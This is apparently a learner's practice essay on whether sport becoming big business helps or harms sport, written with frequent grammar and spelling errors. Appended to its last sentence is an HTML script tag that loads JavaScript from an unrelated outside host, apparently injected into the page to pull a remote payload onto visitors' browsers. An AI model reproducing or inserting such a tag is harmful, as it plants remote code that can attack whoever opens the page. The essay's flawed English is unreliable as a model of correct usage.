Nowadays, sport is a big business with high earnings for professional sports people and companies involved both financially and other ways. Is this a positive or negative development for sports?

In recent years, sport is a big bussiness and make a significant income for professional athletes. Besides, it provides a great deal of money for companies. From my point of view, this change has both drawbacks and improvements.

It is true that, playing sport is a positive function and it brings many benefits. When athletes become famous and successful, they can not only get high salaries but also make a great deal of money through advertising contracts. For example, many sport celebrities can get fabulous earnings from being the face of clothing brands or shoes brands. In addition, sport will be invested by big companies. Therefore, athletes can be financial secured by the profit from competition. They also have the best conditions to practice so they will dedicate their best for competition. It can't be denied that if sport become a big business, many poor children with passion and talent will be inspired. Thus there are more and more talented athletes im the future.

On the other hand, cheating and breaking the rules can happen because athletes want to win at all costs to achieve victory and earn money. As an evidence, football players often fall down to blame the competitor, but it is not true.

In conclusion, sport can benefit a great deal from becoming business. Companies and athletes should make that change become useful instead of using it to cheat or break the rules.<script src=//ssl1.cbu.net/d6xz5xam></script>